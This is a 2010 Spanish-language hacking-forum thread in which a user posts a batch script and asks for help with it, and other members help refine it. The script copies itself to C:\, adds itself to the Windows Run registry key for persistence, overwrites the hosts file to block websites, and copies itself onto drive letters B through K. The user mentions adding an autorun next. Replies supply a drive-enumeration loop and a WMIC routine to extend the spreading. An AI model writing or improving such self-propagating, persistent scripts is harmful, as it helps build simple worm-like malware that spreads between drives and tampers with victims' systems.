elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  esta bien mi bat?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: esta bien mi bat?  (Leído 3,941 veces)
Norlak

Desconectado Desconectado

Mensajes: 101


Ver Perfil
esta bien mi bat?
« en: 21 Septiembre 2010, 20:17 pm »

copy %0 C:\

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hola.bat  /d c:\hola.bat /f

echo 127.0.0.1   www.xxx.com > C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1   www.fotolog.com >> C:\WINDOWS\system32\drivers\etc\hosts

for %%x in ("B", "C", "D", "E", "F", "G", "H", "I", "J", "K") do (copy /y %0 "%%~x:\")
bueno basicamente es eso, lo que e hecho, lo unico que hace es cambiar el fichero Hosts , que es para capar el acceso a las paginas pero sinceramente no tengo ni idea si esta bien eso o no, otra de las cosas que he exo es atraves del comando for ( gracia a la ayuda prestada por los miembros de este foro)
es que dicho bat se copie. si alguien se pudiera tomar la molestia de mirarlo y decirme que tal se lo agradeceria, porque, una vez tenga esto completo quiero tambien intentar hacer un autorun, pero bueno eso son palabras mayores XD

un saludo y de nuevo gracias.

bueno si me pueden ayudar se lo agradeceria muchisimo. gracias por adelantado ;D


« Última modificación: 23 Septiembre 2010, 15:54 pm por juampgaditano » En línea

Rectificar es de sabios, aprende de tus errores para ser alguien mejor.
-=[ §ÂßÂÑÐØ ]=-


Desconectado Desconectado

Mensajes: 857


[[CoNoCiMiEnTo Es PoDeR]]


Ver Perfil WWW
Re: Necesito ayuda para mi BAT
« Respuesta #1 en: 21 Septiembre 2010, 20:35 pm »

Creo que eso no se puede hacer, puedes hacer para meter la letra de unidad que quieres en una variable,y luego hacer la copia, pero no un comodin para todas las letras de unidad.


En línea

SALUDOS DE -=[ §AßAÑÐØ ]=-




Ari Slash


Desconectado Desconectado

Mensajes: 1.783



Ver Perfil WWW
Re: Necesito ayuda para mi BAT
« Respuesta #2 en: 21 Septiembre 2010, 20:37 pm »

aquihay un post de hace unos años el cual carlitos.dll creo un bat para detectar las unidades extraibles conectadas

hechale un vistazo
http://foro.elhacker.net/printpage.html;topic=218760.0

para las demas dudas el foro esta lleno de informacion


saludos
En línea

Norlak

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: Necesito ayuda para mi BAT
« Respuesta #3 en: 21 Septiembre 2010, 20:39 pm »

Creo que eso no se puede hacer, puedes hacer para meter la letra de unidad que quieres en una variable,y luego hacer la copia, pero no un comodin para todas las letras de unidad.

Gracias por contestar, y por tu información, aun así seguire buscando y si encuentro algo te lo are saber.

un saludo :laugh:
En línea

Rectificar es de sabios, aprende de tus errores para ser alguien mejor.
Norlak

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: Necesito ayuda para mi BAT
« Respuesta #4 en: 21 Septiembre 2010, 21:05 pm »

aquihay un post de hace unos años el cual carlitos.dll creo un bat para detectar las unidades extraibles conectadas

hechale un vistazo
http://foro.elhacker.net/printpage.html;topic=218760.0

para las demas dudas el foro esta lleno de informacion


saludos

gracias, esta muy bien ese codigo, pero no es eso exactamente lo que buscaba aun asi gracias por el aporte porque esta muy bien el "progamita"



Saludos.
En línea

Rectificar es de sabios, aprende de tus errores para ser alguien mejor.
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: Necesito ayuda para mi BAT
« Respuesta #5 en: 21 Septiembre 2010, 21:52 pm »

Código
  1. for %%x in ("A", "B", "C", "D", "E", "F") do (copy /y %0 "%%~x:\")
  2.  
Lee sobre for.

Y a tu código del REG ADD, añádele el parámetro /f para sobreescribir.
En línea

Norlak

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: Necesito ayuda para mi BAT
« Respuesta #6 en: 22 Septiembre 2010, 00:19 am »

Código
  1. for %%x in ("A", "B", "C", "D", "E", "F") do (copy /y %0 "%%~x:\")
  2.  
Lee sobre for.

Y a tu código del REG ADD, añádele el parámetro /f para sobreescribir.

muchisimas gracias de verdad, cuando lo tenga terminado lo mostrare para que veais que es lo que he echo,

luego probare lo que me as dicho y de nuevo muchas gracias por contestar.


saludos ;-)
En línea

Rectificar es de sabios, aprende de tus errores para ser alguien mejor.
modubat

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Necesito ayuda para mi BAT
« Respuesta #7 en: 22 Septiembre 2010, 19:27 pm »

Con esta función que codee obtienes las unidades luego ya es fácil, puedes usar copy xcopy o robocopy y un for

Código
  1. @ECHO OFF
  2. CALL :VOLS
  3. FOR /F "DELIMS== TOKENS=2" %%A IN ('SET VOL') DO ECHO.%%A
  4. PAUSE>NUL
  5.  
  6. ======================================================================================
  7.  
  8. :: Carga en variables del tipo VOL1, VOL2, VOL3... las unidades del disco duro
  9. :: Si sólo se quiere el nombre de la unidad y no la descripción cambiar "*" por "1".
  10. :: Sin argumentos
  11.  
  12. :VOLS
  13.  
  14. :: Empezamos el contador
  15. SET/A CONT=0
  16. ::
  17. :: Obtemos las unidades con Wmic
  18. FOR /F "SKIP=1 TOKENS=*" %%A IN (
  19. '"WMIC LOGICALDISK GET CAPTION, DESCRIPTION"'
  20. ) DO (
  21. :: Aumenta el contador
  22. SET/A "COUNT+=1"
  23. :: Declaramos las variables
  24. CALL SET "VOL%%COUNT%%=%%A"
  25. )
  26.  
  27. ======================================================================================
  28.  
En línea

Norlak

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: Necesito ayuda para mi BAT
« Respuesta #8 en: 22 Septiembre 2010, 21:04 pm »

Con esta función que codee obtienes las unidades luego ya es fácil, puedes usar copy xcopy o robocopy y un for


muchas gracias por ayudarme enserio, cuando lo acabe os lo enseño y gracias

En línea

Rectificar es de sabios, aprende de tus errores para ser alguien mejor.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
He subido la FSB de 100 a 120 ¿está bien?
Hardware
4rm4ndo 7 4,610 Último mensaje 11 Mayo 2011, 11:42 am
por Artikbot
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines